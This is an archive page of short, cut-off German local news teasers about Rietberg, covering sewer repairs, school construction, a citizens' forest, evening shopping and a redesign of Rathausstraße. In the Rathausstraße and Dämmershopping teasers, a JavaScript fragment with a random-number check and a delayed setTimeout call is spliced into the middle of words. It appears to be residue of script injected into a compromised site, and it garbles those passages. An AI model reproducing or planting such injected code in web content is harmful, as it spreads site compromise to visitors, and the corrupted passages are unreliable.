Category Archives: Rietberg

Kanalsanierung ohne zu baggern

In den kommenden Wochen stehen in Neuenkirchen, Rietberg und Westerwiehe einige Kanalsanierungen an. Die Schäden an Schmutz- und Regenwasserkanal können glücklicherweise in geschlossener Bauweise saniert werden, also ohne Aufgrabung. Dennoch lassen sich Verkehrsbehinderungen nicht vollständig vermeiden. Sanierungsfahrzeuge verschiedener Firmen müssen über mehrere Monate immer wieder einmal an den Schächten stehen. Die Stadtverwaltung Rietberg bittet um

Ein Blick hinter den Bauzaun am Schulzentrum

Die komplette Umgestaltung des Schulzentrums in Rietberg mit dem Neubau des Gymnasiums und anschließenden Erneuerung der Gesamtschule ist das wohl aufwendigste Projekt der jüngeren Stadtgeschichte. Mehr als 50 Millionen Euro werden hier binnen zehn Jahren investiert. Einen Blick hinter den Bauzaun will Bürgermeister Andreas Sunder jetzt allen interessierten Bürgerinnen und Bürgern gewähren. Am Mittwoch, 7.

Pausenhof-Sanierung noch in diesem Sommer

Die Emsschule in Rietberg, die an der Straße Rinnerforth gelegene Grundschule, wird in den nächsten Jahren ihr Gesicht verändern. An gleich drei Stellen parallel wird in der Stadtverwaltung gerade geplant: Ein Neubau hinter der Schule und die Sanierung des Pausenhofes stehen schon bald an. Und noch ein weiterer Anbau an das bestehende Gebäude vor der

Investor Närmann baut im Stil der historischen Altstadt

Mit einer Front aus kleinformatigem Backstein und urigem Fachwerk samt Utlucht und einer hübschen Dachgaube fügt sich in der Mühlenstraße ein neuer Baukörper nahtlos in die historische Häuserreihe ein. Zwischen den Gebäuden Nummer 8 und Nummer 12 bauen Petra und Josef Närmann gerade ein Zwei-Familien-Haus, das in wenigen Monaten kaum noch als Neubau zu erkennen

Ein Selfie mit der Esskastanie

Der erste Bürgerwald im Stadtteil Rietberg wächst und gedeiht. Schon seit November wachsen fast 50 junge Bäume auf einer freien Fläche neben dem Friedhof am Franziskusweg. Zu einem gemeinsamen Pflanzfest hatte Rietbergs Bürgermeister Andreas Sunder die Baumpaten, die die Bäume als Spender finanziert hatten, coronabedingt leider nicht einladen können. Trotzdem haben sich die Stifter jüngst

Dämmershopping im besonderen Lichterglanz

Das nächste Dämmershopping, die verlängerte Öffnungszeit am Freitagabend, steht in dieser Woche unter besonderen Vorzeichen. Denn pünktlich zum Dämmershopping wird am 11. Dezember erstmals eine spezielle Illumination im Rahmen des Rietberger Winterzaubers angeschaltet.   An sechs Punkten entlang der Rathausstraße, zwischen Nordtor und Südtor, will die Stadtmarketing Rietberg GmbH mit einer speziellen Beleuchtung eine besondere

Umgestaltung der Rathausstraße rückt näher

Die Rathausstraße in Rietberg soll (noch) schöner werden. Deshalb hatte die Stadt Rietberg im Juni den Sieger eines freiraumplanerischen Wettbewerbs gekürt: das Büro RMP Stephan Lenzen Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andschaftsarchitekten aus Köln. Bevor die Ideen in die Tat umgesetzt werden können, war noch viel Vorarbeit nötig. Wie in solchen Wettbewerbsverfahren

Viertes Dämmershopping im Historischen Stadtkern

Das Dämmershopping, die verlängerte Öffnungszeit am Freitagabend, geht in dieser Woche in die vierte Runde. Die Rietberger Einzelhändler haben entschieden, ihre Geschäfte am 13. November wie geplant bis 21 Uhr zu öffnen. Wie immer lassen sich die Geschäftsleute kleine Besonderheiten für ihre Kunden einfallen.  Abstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andsregeln müssen natürlich

Hohe Aufenthaltsqualität gewinnt

Das Preisgericht hatte die Qual der Wahl: 14 Beiträge hatten Architekturbüros eingereicht, um sich an einem Realisierungswettbewerb der Stadt Rietberg zu beteiligen. Die Anforderung: Ein 17.000 Quadratmeter umfassendes Plangebiet entlang der Rathausstraße in der Rietberger Innenstadt ansprechend zu gestalten und damit die Aufenthaltsqualität zu steigern. Auf einem Abschnitt vom Nord- bis zum Südtor waren umsetzbare

Friedhöfe in Rietberg nun städtische Angelegenheit

Gut vorbereitet ist die Stadt Rietberg auf ihre neue Aufgabe, die sie offiziell mit Beginn des neuen Jahres übernimmt: die Verwaltung der Friedhöfe in Rietberg und Bokel. Dafür wurden Mitarbeiter geschult und in einer neuen Abteilung zusammengeführt. Denn wenn nahe Angehörige, Ehepartner oder gar Kinder sterben, stehen einerseits die qualifizierten Bestattungsunternehmen den Hinterbliebenen hilfreich zur